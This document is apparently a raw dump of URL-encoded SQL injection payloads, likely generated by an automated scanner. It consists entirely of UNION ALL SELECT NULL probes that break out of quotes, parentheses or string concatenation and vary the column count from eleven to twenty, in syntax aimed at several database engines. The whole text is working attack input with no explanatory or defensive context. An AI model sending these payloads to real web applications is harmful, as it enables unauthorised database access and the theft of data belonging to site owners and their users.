1234.5%27%29%20WHERE%201291%3D1291%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%204102%3D4102%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208825%3D8825%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202374%3D2374%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204613%3D4613%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207992%3D7992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202487%3D2487%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%205684%3D5684%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208116%3D8116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209530%3D9530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207683%3D7683%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204271%3D4271%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209292%3D9292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203129%3D3129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%209558%3D9558%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203640%3D3640%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208366%3D8366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204215%3D4215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204667%3D4667%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206588%3D6588%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205913%3D5913%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208386%3D8386%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208689%3D8689%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20%7C%7C%20%28SELECT%208859%20FROM%20DUAL%20WHERE%203637%3D3637%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202567%20FROM%20DUAL%20WHERE%205921%3D5921%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205962%20FROM%20DUAL%20WHERE%205228%3D5228%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205864%20FROM%20DUAL%20WHERE%206203%3D6203%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202220%20FROM%20DUAL%20WHERE%203240%3D3240%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205167%20FROM%20DUAL%20WHERE%202976%3D2976%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208791%20FROM%20DUAL%20WHERE%201575%3D1575%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203404%20FROM%20DUAL%20WHERE%206910%3D6910%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203996%20FROM%20DUAL%20WHERE%207273%3D7273%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209177%20FROM%20DUAL%20WHERE%205869%3D5869%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209056%20WHERE%207462%3D7462%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209578%20WHERE%205700%3D5700%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206944%20WHERE%209265%3D9265%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205065%20WHERE%202398%3D2398%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205888%20WHERE%209014%3D9014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207276%20WHERE%201444%3D1444%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206457%20WHERE%206977%3D6977%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202559%20WHERE%204822%3D4822%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207056%20WHERE%207492%3D7492%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206493%20WHERE%204317%3D4317%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203813%20FROM%20DUAL%20WHERE%203380%3D3380%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201770%20FROM%20DUAL%20WHERE%208723%3D8723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202233%20FROM%20DUAL%20WHERE%205529%3D5529%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208535%20FROM%20DUAL%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208557%20FROM%20DUAL%20WHERE%209479%3D9479%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208601%20FROM%20DUAL%20WHERE%202251%3D2251%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209932%20FROM%20DUAL%20WHERE%208504%3D8504%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203335%20FROM%20DUAL%20WHERE%209348%3D9348%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206603%20FROM%20DUAL%20WHERE%209770%3D9770%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202495%20FROM%20DUAL%20WHERE%209952%3D9952%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205903%20WHERE%206994%3D6994%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209498%20WHERE%201217%3D1217%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202351%20WHERE%206668%3D6668%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205856%20WHERE%203181%3D3181%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206542%20WHERE%209095%3D9095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206845%20WHERE%202837%3D2837%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203986%20WHERE%204770%3D4770%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205898%20WHERE%207309%3D7309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203301%20WHERE%202134%3D2134%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207068%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%27%20%2B%20%28SELECT%20%27zGPN%27%20FROM%20DUAL%20WHERE%202393%3D2393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wEPf%27%20FROM%20DUAL%20WHERE%202768%3D2768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iUUI%27%20FROM%20DUAL%20WHERE%202389%3D2389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27vcGj%27%20FROM%20DUAL%20WHERE%206626%3D6626%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27HAsJ%27%20FROM%20DUAL%20WHERE%209939%3D9939%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Mfgg%27%20FROM%20DUAL%20WHERE%201752%3D1752%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Ybug%27%20FROM%20DUAL%20WHERE%209195%3D9195%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jRIF%27%20FROM%20DUAL%20WHERE%201221%3D1221%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BJnW%27%20FROM%20DUAL%20WHERE%208116%3D8116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jYkM%27%20FROM%20DUAL%20WHERE%201703%3D1703%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BpON%27%20WHERE%209257%3D9257%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Sdco%27%20WHERE%205353%3D5353%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YiGJ%27%20WHERE%202895%3D2895%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wHJu%27%20WHERE%205097%3D5097%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NxwE%27%20WHERE%206835%3D6835%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XhPX%27%20WHERE%205919%3D5919%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27DGij%27%20WHERE%205397%3D5397%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 